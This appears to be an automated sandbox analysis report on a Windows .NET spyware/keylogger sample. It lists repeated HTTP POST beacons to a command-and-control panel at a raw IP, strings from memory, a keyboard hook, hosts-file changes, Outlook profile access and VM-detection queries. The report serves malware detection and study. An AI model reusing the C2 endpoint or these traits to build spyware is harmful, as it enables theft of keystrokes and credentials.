                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continueConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continueConnection: Keep-Alive
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php127.0.0.1POST
                  Source: file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218x&
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://ymuZnB.com
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%(
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                  Source: file.exe, 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmpString found in binary or memory: https://qL4JAKSuGatRwuRZIZxu.com
                  Source: file.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Installs a global keyboard hookShow sources
                  Source: C:\Users\user\Desktop\file.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exe
                  Source: C:\Users\user\Desktop\file.exeWindow created: window name: CLIPBRDWNDCLASS

                  Spam, unwanted Advertisements and Ransom Demands:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  System Summary:

                  barindex
                  .NET source code contains very large array initializationsShow sources
                  Source: file.exe, u003cPrivateImplementationDetailsu003eu007bE8C26188u002d0CCBu002d4AC0u002d8B11u002d8FD1685A3376u007d/DD56AB72u002dC86Bu002d4D01u002dAE5Fu002dAD08782C2927.csLarge array initialization: .cctor: array initializer size 12062
                  Source: 0.0.file.exe.8d0000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE8C26188u002d0CCBu002d4AC0u002d8B11u002d8FD1685A3376u007d/DD56AB72u002dC86Bu002d4D01u002dAE5Fu002dAD08782C2927.csLarge array initialization: .cctor: array initializer size 12062
                  Source: 0.2.file.exe.8d0000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE8C26188u002d0CCBu002d4AC0u002d8B11u002d8FD1685A3376u007d/DD56AB72u002dC86Bu002d4D01u002dAE5Fu002dAD08782C2927.csLarge array initialization: .cctor: array initializer size 12062
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DB0BA NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DB089 NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD1D60
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDB6C5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD3608
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6A220
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6882C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6E848
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6A7AE
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6D110
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6D558
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6B190
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05847300
                  Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                  Source: file.exe, 00000000.00000002.610772201.0000000000E00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs file.exe
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs file.exe
                  Source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs file.exe
                  Source: file.exe, 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe4 vs file.exe
                  Source: file.exe, 00000000.00000002.611249212.00000000010A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe4 vs file.exe
                  Source: file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: file.exe, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: file.exe, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.0.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.0.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@1/2@0/1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DAF3E AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DAF07 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\jbvm20a0.pwnJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: file.exeVirustotal: Detection: 53%
                  Source: file.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: file.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: mscorrc.pdb source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D24C4 push esi; ret
                  Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
